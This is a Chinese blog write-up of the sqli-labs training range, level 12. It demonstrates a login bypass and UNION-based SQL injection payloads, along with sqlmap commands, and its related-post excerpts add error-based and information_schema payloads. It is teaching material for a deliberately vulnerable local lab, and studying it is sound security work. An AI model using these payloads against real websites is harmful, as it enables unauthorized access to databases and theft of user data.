Sqli-labs靶场第12关详解[Sqli-labs-less-12]

已于 2024-03-02 20:02:08 修改
阅读量453 收藏 10
点赞数 5
分类专栏: sqli-labs 文章标签: 数据库 web安全 mysql 安全 sql
于 2024-03-02 20:00:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136421115
版权
Sqli-labs-Less-12

#手工注入

post传参了

根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站

1. Username输入a'  a"  测试是否会有报错,burp抓包

报错:syntax to use near '"a"") and password=("") LIMIT 0,1' at line 1

分析可知,username和password 的条件判断在一个where语句中;整条语句使用双引号加小括号  ") 闭合。

所以,payload分析输入一个username值然后使用双引号加小括号  ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。只需填写username。

即payload:

a") or 1=1--

成功登录!!!

尝试漏洞利用,使用order by 测试列数   当值=1时正常回显

当值为3时报错显示,所以列数为2

根据列数使用union联合查询测试显示位:

输入:-admin") union select 1,2--

发现有两个显示为,进行利用,爆出当前数据库名称及当前用户名

成功利用漏洞!!!

#自动化注入-SQLmap工具注入

SQLmap用户手册:用法 - sqlmap 用户手册

由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包  用-r 选择目标txt文件

Python sqlmap.py -r data.txt --current-db --current-user

爆出当前用户名及当前数据库名称

成功管理用漏洞!!!

「已注销」
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场Less-12
songling515010475的专栏
08-25 256
1、访问首页,/Less-12/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。 admin") order by 3-- qwe 3、查看SQL结果显示点 ") union select 1,2-- ..
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(12
jimggg的博客
03-20 174
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入) 应题,基于错误的双引号post字符型注入 uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&a...
Sqli-lab教程-史上最全详解(1-22通
最新发布
wangluoanquan111的博客
04-20 658
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
Sqlilabs-12
KAKA的博客
07-07 286
这里到了 12 ,是 11 的练习版本,只不过是把单引号换成了 双引号 + 括号,其余的都是一样的。 这里仍然以 hackbar 为例构造 payload: uname=admin") order by 3#&passwd=1&submit=submit uname=admin") order by 2#&passwd=1&submit=submit uname=-admin") union select 1,2#&passwd=1&submit=sub.
sqli-labs第十二
yuqnqi的博客
05-08 724
对了,也可以用报错注入,下次再写。由此判断为,双引号反括号闭合;post传值,跟十一差不多。就是正常的sql注入流程。第一步,判断闭合方式。
sqli-labs第12
weixin_45626840的博客
04-23 322
思路一样 闭合类型为 “)
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-lab(12)
qq_53030229的博客
05-03 509
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代.
sqli-labs(12)
weixin_30699465的博客
05-24 80
0X01摘要体现(小编这里傻逼了 可以直接用group_concat函数绕过显示问题我还在用limit绕过) 还是这个模块 我们很熟徐那么先来尝试一下 单引号加入 无报错信息 哦豁 加入双引号试试呐 哦豁 好像报错 了 还多了一个括号 那我们尝试一下闭合语句 ") order by 1 # 好像成功闭合了 哈哈 看来没有猜错 元语句应该是 id=("") 那都...
sqli-labs12(基于post提交的双引号闭合的字符型注入)通思路
zyh1588的博客
11-10 607
小白回顾sql注入靶场12
sqli-labs靶场第十二
gou1791241251的博客
12-27 728
第十二与第十一差在了单引号和双引号, admin") or (select table_name from information_schema.tables where table_schema=database())=‘emails’ # 执行同样的操作即可查询出数据库的信息啦。
sqli-labs通(十一)(十二)
qq_65950075的博客
05-03 157
变成了一个登录页面,那么注入点就在输入框里面。前十使用的是get请求,参数都体现在url上面,而从十一开始是post请求,参数是在表单里面。我们可以直接在输入框进行注入就行。并且参数不在是一个还是两个。根据前面的认识我们可以猜测sql语句。大概的形式应该是这样username=参数 and password=参数 ,只是不知道是字符型还是整数型。跟第一一样,我们直接用爆出数据库名和版本号。我们在输入框输入1',直接出现报错信息。判断字段数为2,因为3报错。根据报错信息,我们输入。
sqli-labs (less-12)
kukudeshuo的博客
03-09 1100
sqli-labs (less-12) 进入12,我们发现页面和11一样,我们先输入用户名和密码进去,我们发现用户名和密码也是使用POST的方式传了上去,那我们像11一样使用hackbar抓取POST请求 判断注入类型 uname=admin'&passwd=admin&submit=Submit #页面不报错 uname=admin"&passwd=admin&submit=Submit #页面有错误显示 根据输入"时的报错信息我们确定闭合方式为"),也确定为
sqlmap跑sqli-labs靶场第一
01-06
以下是使用sqlmap跑sqli-labs靶场第一的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞,sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值